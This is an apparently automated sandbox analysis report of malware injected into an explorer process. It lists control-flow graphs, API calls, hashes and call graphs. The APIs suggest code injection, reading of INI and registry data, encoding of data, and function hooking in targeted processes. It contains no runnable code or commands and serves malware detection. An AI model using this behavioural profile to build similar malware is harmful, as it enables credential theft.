                                                                                                                                      control_flow_graph 31 a3a298-a3a29b 32 a3a2a5-a3a2a9 31->32 33 a3a2b5 32->33 34 a3a2ab-a3a2b3 32->34 35 a3a2b7 33->35 36 a3a29d-a3a2a3 33->36 34->33 37 a3a2ba-a3a2c1 35->37 36->32 39 a3a2c3-a3a2cb 37->39 40 a3a2cd 37->40 39->40 40->37 41 a3a2cf-a3a2d2 40->41 42 a3a2e7-a3a2f4 41->42 43 a3a2d4-a3a2e2 41->43 53 a3a2f6-a3a2f8 42->53 54 a3a30e-a3a31c call a3a25a 42->54 44 a3a2e4-a3a2e5 43->44 45 a3a31e-a3a339 43->45 44->42 46 a3a36a-a3a36d 45->46 48 a3a372-a3a379 46->48 49 a3a36f-a3a370 46->49 52 a3a37f-a3a383 48->52 51 a3a351-a3a355 49->51 55 a3a357-a3a35a 51->55 56 a3a33b-a3a33e 51->56 57 a3a3e0-a3a3e9 52->57 58 a3a385-a3a39e LoadLibraryA 52->58 61 a3a2fb-a3a302 53->61 54->32 55->48 62 a3a35c-a3a360 55->62 56->48 60 a3a340 56->60 63 a3a3ec-a3a3f5 57->63 59 a3a39f-a3a3a6 58->59 59->52 66 a3a3a8 59->66 67 a3a341-a3a345 60->67 81 a3a304-a3a30a 61->81 82 a3a30c 61->82 62->67 68 a3a362-a3a369 62->68 69 a3a3f7-a3a3f9 63->69 70 a3a41a-a3a46a VirtualProtect * 2 63->70 71 a3a3b4-a3a3bc 66->71 72 a3a3aa-a3a3b2 66->72 67->51 73 a3a347-a3a349 67->73 68->46 75 a3a3fb-a3a40a 69->75 76 a3a40c-a3a418 69->76 77 a3a46e-a3a473 70->77 79 a3a3be-a3a3ca 71->79 72->79 73->51 80 a3a34b-a3a34f 73->80 75->63 76->75 77->77 78 a3a475-a3a484 77->78 85 a3a3d5-a3a3df 79->85 86 a3a3cc-a3a3d3 79->86 80->51 80->55 81->82 82->54 82->61 86->59
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 00A3A397
                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00A3A441
                                                                                                                                      • VirtualProtect.KERNELBASE ref: 00A3A45F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a39000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                      • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                      • Instruction ID: 240d75ebfc128fdb1176a8cbfbf0802f095b1ab4bfa02c19079121eb298e7540
                                                                                                                                      • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                      • Instruction Fuzzy Hash: 97514732758D2D4BCB24ABB898C42E5B3D1F779321F18062AE4DAC7294D969D8468383
                                                                                                                                      Function 00A33254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 87 a33254-a33287 call a3298c 90 a3343a-a33456 87->90 91 a3328d-a33297 call a3298c 87->91 91->90 94 a3329d-a332aa call a3272c 91->94 97 a332b5 94->97 98 a332ac-a332b3 94->98 99 a332b7-a332c2 call a32688 97->99 98->99 102 a332c8-a332fe call a32688 call a31838 * 2 call a32938 99->102 103 a3342c-a33435 call a330a8 99->103 113 a33304-a33318 GetPrivateProfileSectionNamesW 102->113 114 a3340c-a33427 call a31860 * 4 102->114 103->90 113->114 115 a3331e-a33326 113->115 114->103 115->114 117 a3332c-a3332f 115->117 117->114 119 a33335-a33348 117->119 124 a333f0-a33406 119->124 125 a3334e-a33377 GetPrivateProfileStringW 119->125 124->114 124->117 125->124 127 a33379-a33398 GetPrivateProfileIntW 125->127 130 a333e5-a333eb call a330a8 127->130 131 a3339a-a333ad call a32688 127->131 130->124 135 a333c6-a333e3 call a330a8 call a31860 131->135 136 a333af-a333b3 131->136 135->124 137 a333b5-a333ba 136->137 138 a333bd-a333c4 136->138 137->138 138->135 138->136
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00A3298C: GetFileAttributesW.KERNELBASE ref: 00A3299E
                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00A3330F
                                                                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00A3336F
                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 00A3338C
                                                                                                                                        • Part of subcall function 00A330A8: FindFirstFileW.KERNELBASE ref: 00A33104
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 970345848-0
                                                                                                                                      • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                      • Instruction ID: 7c36409d49f170a1272aa11c73ef9568dfdf0ff21ad2e262286cc48c8fdfe46f
                                                                                                                                      • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                      • Instruction Fuzzy Hash: 8E51A53171CF094FEF59BB2CA85667972D2EB98300F44456EF40AC7296EE64DD418386
                                                                                                                                      Function 00A33458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • StrStrIW.KERNELBASE ref: 00A3347E
                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 00A3353F
                                                                                                                                      • RegEnumKeyExW.KERNELBASE ref: 00A335D6
                                                                                                                                        • Part of subcall function 00A32774: RegOpenKeyExW.KERNELBASE ref: 00A327C7
                                                                                                                                        • Part of subcall function 00A32774: RegQueryValueExW.KERNELBASE ref: 00A327F4
                                                                                                                                        • Part of subcall function 00A32774: RegQueryValueExW.KERNELBASE ref: 00A3283A
                                                                                                                                        • Part of subcall function 00A32774: RegCloseKey.KERNELBASE ref: 00A32860
                                                                                                                                        • Part of subcall function 00A33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00A3330F
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1841478724-0
                                                                                                                                      • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                      • Instruction ID: b18cbd0a43164da40635547118c50aec95e82a36f34817421e85fa1c77c064d9
                                                                                                                                      • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                      • Instruction Fuzzy Hash: 96415930718B0C4FDB98EF6D949972AB6E2FB98341F40456EB14EC3261DF34D9448B42
                                                                                                                                      Function 00A32938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 232 a32938-a32943 233 a32945-a32948 232->233 234 a32984 232->234 233->234 235 a3294a-a32970 CreateFileW 233->235 236 a32986-a3298b 234->236 237 a32972-a3297a CloseHandle 235->237 238 a32980-a32982 235->238 237->238 238->236
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                      • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                      • Instruction ID: 4353f6915e4d835bc35a30c66ebf2fd86edecaf65cf8100883c4b31db03b457a
                                                                                                                                      • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                      • Instruction Fuzzy Hash: 3DF09B7021570A4FE7546FB94498336B5E0FB48355F18473DF45AC22D0D73589468742
                                                                                                                                      Function 00A322B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 251 a322b4-a322c6 252 a322d6-a322e6 251->252 253 a322c8-a322d0 CreateStreamOnHGlobal 251->253 253->252
                                                                                                                                      APIs
                                                                                                                                      • CreateStreamOnHGlobal.COMBASE ref: 00A322D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGlobalStream
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2244384528-0
                                                                                                                                      • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                      • Instruction ID: 983a92297e708e1d22703afbe5c034ebe6615020b2c8f78591cf9577568ad971
                                                                                                                                      • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                      • Instruction Fuzzy Hash: 55E08C30108B0A8FD758AFBCE4CA17A33A1EB9C252B05053EE005CB114D27988C18741
                                                                                                                                      Function 00A3298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 254 a3298c-a32997 255 a329b5 254->255 256 a32999-a3299c 254->256 257 a329b7-a329bc 255->257 256->255 258 a3299e-a329a7 GetFileAttributesW 256->258 259 a329b1-a329b3 258->259 260 a329a9-a329af 258->260 259->257 260->259
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE ref: 00A3299E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                      • Instruction ID: 54e4abde0976d08ac5ad411894da3261982b70f5844a3656cab5c5b2d0b74eab
                                                                                                                                      • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                      • Instruction Fuzzy Hash: 04D0A732712905077B6427F90CDD37130A0D71932AF140B3AFA36C12E0E295CCD5A301
                                                                                                                                      Function 00A31860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 261 a31860-a31870 call a31ad4 264 a31872-a31880 RtlFreeHeap 261->264 265 a31886-a3188b 261->265 264->265
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                      • Instruction ID: 12abc9424407d3b1a49ce848cd2c036b313bd497d4ee040f73c97753a60afa71
                                                                                                                                      • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                      • Instruction Fuzzy Hash: CBD01224B16A080BEF2CBBFA1D8D174BAD2E758212F188465B819C3251DD39C895C345

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:6.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:223
                                                                                                                                      Total number of Limit Nodes:16
                                                                                                                                      execution_graph 1335 3223371 1336 32233b2 1335->1336 1337 322337a 1335->1337 1345 3221274 VirtualQuery 1337->1345 1340 3223386 RtlEnterCriticalSection 1347 3223132 1340->1347 1346 322128b 1345->1346 1346->1336 1346->1340 1348 322314d 1347->1348 1361 32232e8 1347->1361 1348->1361 1371 3221000 GetProcessHeap RtlAllocateHeap 1348->1371 1350 32231cd 1372 3221000 GetProcessHeap RtlAllocateHeap 1350->1372 1352 3223212 1353 32232d8 1352->1353 1354 322322c lstrlen 1352->1354 1355 3221011 3 API calls 1353->1355 1354->1353 1356 322323d 1354->1356 1357 32232df 1355->1357 1373 3221141 lstrlen lstrlen 1356->1373 1359 3221011 3 API calls 1357->1359 1359->1361 1368 3222f1f 1361->1368 1363 3223260 1376 3221000 GetProcessHeap RtlAllocateHeap 1363->1376 1365 322327f wsprintfA lstrcat 1377 3221011 1365->1377 1367 32232b8 lstrcat lstrlen RtlMoveMemory 1367->1353 1369 3222f23 CreateThread CloseHandle 1368->1369 1370 3222f3c RtlLeaveCriticalSection 1368->1370 1369->1370 1382 3222ed2 1369->1382 1370->1336 1371->1350 1372->1352 1374 3221162 1373->1374 1374->1353 1375 3221000 GetProcessHeap RtlAllocateHeap 1374->1375 1375->1363 1376->1365 1378 3221274 VirtualQuery 1377->1378 1379 3221019 1378->1379 1380 322102d 1379->1380 1381 322101d GetProcessHeap HeapFree 1379->1381 1380->1367 1381->1380 1383 3222f16 RtlExitUserThread 1382->1383 1384 3222edd 1382->1384 1394 322178c lstrlen 1384->1394 1387 3222f0e 1389 3221011 3 API calls 1387->1389 1389->1383 1392 3222f07 1393 3221011 3 API calls 1392->1393 1393->1387 1395 32217d3 1394->1395 1396 32217a4 CryptBinaryToStringA 1394->1396 1395->1387 1400 3221b1b 1395->1400 1396->1395 1397 32217b7 1396->1397 1412 3221000 GetProcessHeap RtlAllocateHeap 1397->1412 1399 32217c2 CryptBinaryToStringA 1399->1395 1401 3221b31 lstrlen 1400->1401 1402 3221b3e 1400->1402 1401->1402 1413 3221000 GetProcessHeap RtlAllocateHeap 1402->1413 1404 3221b46 lstrcat 1405 3221b82 1404->1405 1406 3221b7b lstrcat 1404->1406 1414 322186c 1405->1414 1406->1405 1409 3221011 3 API calls 1410 3221ba5 1409->1410 1411 322105d VirtualFree 1410->1411 1411->1392 1412->1399 1413->1404 1437 3221000 GetProcessHeap RtlAllocateHeap 1414->1437 1416 3221890 1438 322106c lstrlen MultiByteToWideChar 1416->1438 1418 322189f 1439 32217dc RtlZeroMemory 1418->1439 1421 32218f1 RtlZeroMemory 1424 3221926 1421->1424 1422 3221011 3 API calls 1423 3221b10 1422->1423 1423->1409 1425 3221af3 1424->1425 1441 3221000 GetProcessHeap RtlAllocateHeap 1424->1441 1425->1422 1427 32219e2 wsprintfW 1429 3221a02 1427->1429 1428 3221add 1430 3221011 3 API calls 1428->1430 1429->1428 1442 3221000 GetProcessHeap RtlAllocateHeap 1429->1442 1430->1425 1432 3221a70 1433 3221ad6 1432->1433 1443 322104c VirtualAlloc 1432->1443 1435 3221011 3 API calls 1433->1435 1435->1428 1436 3221ac6 RtlMoveMemory 1436->1433 1437->1416 1438->1418 1440 32217fe 1439->1440 1440->1421 1440->1425 1441->1427 1442->1432 1443->1436 1444 32232f4 1445 3223302 1444->1445 1446 322335f 1445->1446 1447 322332b RtlEnterCriticalSection 1445->1447 1448 3223342 1447->1448 1449 322334e 1447->1449 1454 3222faa 1448->1454 1452 3223357 RtlLeaveCriticalSection 1449->1452 1452->1446 1453 3222f1f 22 API calls 1453->1449 1455 3221141 2 API calls 1454->1455 1456 3222fbf 1455->1456 1457 3222fd1 1456->1457 1458 3221141 2 API calls 1456->1458 1474 3223129 1457->1474 1489 3221000 GetProcessHeap RtlAllocateHeap 1457->1489 1458->1457 1460 3222fe6 1490 3221000 GetProcessHeap RtlAllocateHeap 1460->1490 1462 3222ff1 RtlZeroMemory 1491 3222f3d 1462->1491 1465 3223118 1468 3221011 3 API calls 1465->1468 1466 322301e StrToIntA 1466->1465 1467 3223038 1466->1467 1469 3222f3d 3 API calls 1467->1469 1470 3223120 1468->1470 1471 3223047 1469->1471 1472 3221011 3 API calls 1470->1472 1471->1465 1473 3223051 lstrlen 1471->1473 1472->1474 1475 3222f3d 3 API calls 1473->1475 1474->1453 1476 3223066 1475->1476 1477 3221141 2 API calls 1476->1477 1478 3223074 1477->1478 1478->1465 1503 3221000 GetProcessHeap RtlAllocateHeap 1478->1503 1480 322308b 1481 3222f3d 3 API calls 1480->1481 1482 32230a4 wsprintfA 1481->1482 1504 3221000 GetProcessHeap RtlAllocateHeap 1482->1504 1484 32230cc 1485 3222f3d 3 API calls 1484->1485 1486 32230dd lstrcat 1485->1486 1487 3221011 3 API calls 1486->1487 1488 32230ee lstrcat lstrlen RtlMoveMemory 1487->1488 1488->1465 1489->1460 1490->1462 1492 3222f61 1491->1492 1493 3222f4b 1491->1493 1495 3221141 2 API calls 1492->1495 1494 3221141 2 API calls 1493->1494 1498 3222f57 1494->1498 1496 3222f66 1495->1496 1497 3222fa4 1496->1497 1499 3221141 2 API calls 1496->1499 1497->1465 1497->1466 1498->1497 1500 3221141 2 API calls 1498->1500 1499->1498 1501 3222f8e 1500->1501 1501->1497 1502 3222f92 RtlMoveMemory 1501->1502 1502->1497 1503->1480 1504->1484 1525 3222c8a 1533 3222bf2 1525->1533 1527 3222c9b 1528 3222ca1 lstrlen 1527->1528 1529 3222cc6 1527->1529 1538 3222678 1528->1538 1553 322224c 1533->1553 1537 3222c09 1537->1527 1539 3222691 1538->1539 1540 3222721 1538->1540 1539->1540 1541 3221274 VirtualQuery 1539->1541 1552 322105d VirtualFree 1540->1552 1542 32226a7 1541->1542 1542->1540 1543 3222753 1542->1543 1545 322279e 1542->1545 1547 32226e9 1542->1547 1566 3221000 GetProcessHeap RtlAllocateHeap 1543->1566 1548 32227ad 1545->1548 1567 3221000 GetProcessHeap RtlAllocateHeap 1545->1567 1546 3222768 memcpy 1546->1540 1551 3222700 memcpy 1547->1551 1550 32227c7 memcpy 1548->1550 1550->1540 1551->1540 1552->1529 1564 3221000 GetProcessHeap RtlAllocateHeap 1553->1564 1555 3222254 1556 32223e3 1555->1556 1565 322104c VirtualAlloc 1556->1565 1558 3222633 1558->1537 1559 32225b5 lstrcat lstrcat lstrcat lstrcat 1561 32223fc 1559->1561 1560 3221011 GetProcessHeap HeapFree VirtualQuery 1560->1561 1561->1558 1561->1559 1561->1560 1562 3222346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1561->1562 1563 322231f GetProcessHeap RtlAllocateHeap memcpy 1561->1563 1562->1561 1563->1561 1564->1555 1565->1561 1566->1546 1567->1550 1608 3222c18 1609 3222c2a 1608->1609 1610 3222c82 1609->1610 1611 3222bf2 11 API calls 1609->1611 1612 3222c45 1611->1612 1612->1610 1613 3221141 2 API calls 1612->1613 1614 3222c59 1613->1614 1615 3222c79 1614->1615 1616 3222c5d lstrlen 1614->1616 1619 322105d VirtualFree 1615->1619 1617 3222678 6 API calls 1616->1617 1617->1615 1619->1610 1505 32233b9 1506 32233c2 1505->1506 1507 32233fa 1505->1507 1508 3221274 VirtualQuery 1506->1508 1509 32233ca 1508->1509 1509->1507 1510 32233ce RtlEnterCriticalSection 1509->1510 1511 3223132 13 API calls 1510->1511 1512 32233eb 1511->1512 1513 3222f1f 22 API calls 1512->1513 1514 32233f2 RtlLeaveCriticalSection 1513->1514 1514->1507 1568 3223449 RtlEnterCriticalSection 1571 322346e 1568->1571 1593 32234ce 1568->1593 1569 32235bc RtlLeaveCriticalSection 1570 3221274 VirtualQuery 1572 32234e9 1570->1572 1571->1569 1573 3221274 VirtualQuery 1571->1573 1571->1593 1572->1569 1575 32234fd RtlZeroMemory 1572->1575 1600 32235b1 1572->1600 1574 3223485 1573->1574 1577 3221274 VirtualQuery 1574->1577 1574->1593 1576 3222f3d 3 API calls 1575->1576 1578 322351c 1576->1578 1579 3223494 1577->1579 1578->1569 1580 3223526 StrToIntA 1578->1580 1581 3223498 lstrcat 1579->1581 1579->1593 1580->1569 1582 322353b 1580->1582 1583 3222faa 16 API calls 1581->1583 1584 3221141 2 API calls 1582->1584 1585 32234bc 1583->1585 1586 3223549 1584->1586 1587 3222f1f 22 API calls 1585->1587 1586->1569 1589 3223595 1586->1589 1590 3223558 1586->1590 1588 32234c3 1587->1588 1601 322105d VirtualFree 1588->1601 1594 3222faa 16 API calls 1589->1594 1592 3223574 1590->1592 1602 322105d VirtualFree 1590->1602 1603 322104c VirtualAlloc 1592->1603 1593->1569 1593->1570 1597 32235aa 1594->1597 1599 3222f1f 22 API calls 1597->1599 1598 3223585 RtlMoveMemory 1598->1569 1599->1600 1600->1569 1601->1593 1602->1592 1603->1598 1604 3222cce 1605 3222cd7 1604->1605 1606 3222d02 1605->1606 1607 3222678 6 API calls 1605->1607 1607->1606

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_03221320 1 Function_03229321 2 Function_03223829 15 Function_03223709 2->15 55 Function_032236A1 2->55 97 Function_032235D4 2->97 3 Function_03223132 11 Function_03221000 3->11 16 Function_03221011 3->16 40 Function_03221141 3->40 4 Function_03225137 5 Function_03228A37 6 Function_03229337 7 Function_03221235 8 Function_0322133F 9 Function_03222F3D 9->40 10 Function_03228702 12 Function_03223401 12->3 21 Function_03222F1F 12->21 35 Function_03221274 12->35 13 Function_03221305 14 Function_03221C08 46 Function_0322104C 14->46 61 Function_03221BAF 14->61 65 Function_03221C82 14->65 95 Function_03221BD2 14->95 15->11 15->16 24 Function_03221363 15->24 64 Function_032215BE 15->64 16->35 17 Function_03229814 18 Function_03221B1B 18->11 18->16 31 Function_0322186C 18->31 19 Function_03222E1B 19->11 19->16 20 Function_03222C18 37 Function_03222678 20->37 20->40 52 Function_0322105D 20->52 86 Function_03222BF2 20->86 94 Function_03222ED2 21->94 22 Function_0322231F 22->11 23 Function_03223862 23->0 23->2 23->7 23->11 23->13 23->14 23->16 26 Function_03221261 23->26 23->35 23->40 57 Function_032212AA 23->57 59 Function_03222EA8 23->59 70 Function_0322118D 23->70 72 Function_03221090 23->72 75 Function_03222D9A 23->75 83 Function_03221FE5 23->83 91 Function_032216C7 23->91 24->8 25 Function_03229763 27 Function_03221765 28 Function_0322966A 29 Function_03222B6E 29->16 29->18 29->29 36 Function_03222974 29->36 29->52 68 Function_0322178C 29->68 81 Function_032227E7 29->81 30 Function_0322106C 31->11 31->16 31->30 31->46 31->72 100 Function_032217DC 31->100 32 Function_0322926D 33 Function_03223371 33->3 33->21 33->35 34 Function_03228A71 36->11 36->16 36->27 36->40 36->46 51 Function_0322285F 36->51 36->52 62 Function_032228AD 36->62 37->11 37->35 38 Function_03222643 39 Function_03223840 41 Function_03222346 41->11 41->16 73 Function_03222296 41->73 42 Function_03229844 43 Function_0322104A 44 Function_03223449 44->9 44->21 44->35 44->40 44->46 44->52 58 Function_03222FAA 44->58 45 Function_03221F4E 47 Function_03221E4C 48 Function_0322224C 48->11 49 Function_03229955 50 Function_03222659 51->40 53 Function_032223A2 54 Function_032250A0 55->11 55->16 55->24 99 Function_032214D8 55->99 56 Function_03221CA5 82 Function_03221CE5 56->82 58->9 58->11 58->16 58->40 59->19 60 Function_032215A9 62->40 63 Function_032233B9 63->3 63->21 63->35 64->11 64->16 64->60 64->64 65->82 66 Function_03228B81 67 Function_03222C8A 67->37 67->52 67->86 68->11 69 Function_03223D8D 69->11 69->23 69->35 69->69 80 Function_03223BE1 69->80 71 Function_03228F93 74 Function_03222295 76 Function_03225198 77 Function_03228A9F 78 Function_0322929C 79 Function_032223E3 79->16 79->22 79->41 79->46 79->53 80->0 80->2 80->7 80->11 80->13 80->26 80->35 80->40 80->57 80->59 80->72 80->83 81->16 81->35 83->35 83->45 83->47 84 Function_032295E5 85 Function_03228EEF 86->48 86->79 87 Function_032232F4 87->21 87->58 88 Function_032289F9 89 Function_032213FE 89->11 89->16 96 Function_032213D7 89->96 89->99 90 Function_03228CC3 92 Function_03222CCE 92->37 93 Function_032287CE 94->16 94->18 94->52 94->68 95->56 97->11 97->16 97->24 97->99 98 Function_032293D4 99->11 99->16 99->89 99->96

                                                                                                                                      Executed Functions

                                                                                                                                      Function 03223862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334libraryloaderstringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 3223862-32238de call 3221000 GetModuleFileNameA call 3221000 GetCurrentProcessId wsprintfA call 322118d CreateMutexA GetLastError 7 32238e4-3223940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 3221000 Sleep lstrcmpiA 0->7 8 3223bc5-3223c3a call 3221011 * 2 RtlExitUserThread call 3221000 * 2 wsprintfA call 3221235 0->8 14 3223946-3223961 GetCommandLineW CommandLineToArgvW 7->14 15 3223a0a-3223a14 lstrcmpiA 7->15 69 3223c5e 8->69 70 3223c3c-3223c4c call 3221141 8->70 16 3223bc3-3223bc4 14->16 17 3223967-322398b call 32216c7 GetModuleHandleA GetProcAddress 14->17 19 3223b14-3223b39 call 32216c7 GetModuleHandleA GetProcAddress 15->19 20 3223a1a-3223a24 lstrcmpiA 15->20 16->8 32 322399e-32239c0 GetModuleHandleA GetProcAddress 17->32 33 322398d-3223999 call 3221c08 17->33 34 3223b3b-3223b47 call 3221c08 19->34 35 3223b4c-3223b59 GetModuleHandleA GetProcAddress 19->35 20->19 24 3223a2a-3223a40 lstrcmpiA 20->24 28 3223a42-3223a4e GetCommandLineA StrStrIA 24->28 29 3223a67-3223a71 lstrcmpiA 24->29 28->29 37 3223a50 28->37 30 3223a73-3223a7f GetCommandLineA StrStrIA 29->30 31 3223a88-3223a92 lstrcmpiA 29->31 30->31 38 3223a81-3223a86 30->38 31->16 39 3223a98-3223aa4 GetCommandLineA StrStrIA 31->39 41 32239c2-32239d0 GetModuleHandleA GetProcAddress 32->41 42 32239d6-32239e8 GetModuleHandleA GetProcAddress 32->42 33->32 34->35 44 3223b5b-3223b67 call 3221c08 35->44 45 3223b6c-3223b79 GetModuleHandleA GetProcAddress 35->45 47 3223a55-3223a65 GetModuleHandleA 37->47 38->47 39->16 49 3223aaa-3223ac5 GetModuleHandleA 39->49 41->42 50 3223b08-3223b0f call 32216c7 41->50 51 32239ea-32239f3 GetModuleHandleA GetProcAddress 42->51 52 32239f9-3223a05 42->52 44->45 55 3223b7b-3223b87 call 3221c08 45->55 56 3223b8c-3223bbe call 32216c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->56 48 3223ace-3223ad2 47->48 48->16 61 3223ad8-3223aea call 32216c7 call 3222d9a 48->61 60 3223ac7-3223acc GetModuleHandleA 49->60 49->61 50->16 51->50 51->52 62 3223b03 call 3221c08 52->62 55->56 56->16 60->48 61->50 82 3223aec-3223af5 call 3221274 61->82 62->50 73 3223c64-3223c74 CreateToolhelp32Snapshot 69->73 79 3223c53-3223c59 call 3221261 70->79 80 3223c4e call 3223829 70->80 76 3223c7a-3223c8e Process32First 73->76 77 3223d7d-3223d88 Sleep 73->77 81 3223d6e-3223d70 76->81 77->73 79->69 80->79 85 3223c93-3223ca5 lstrcmpiA 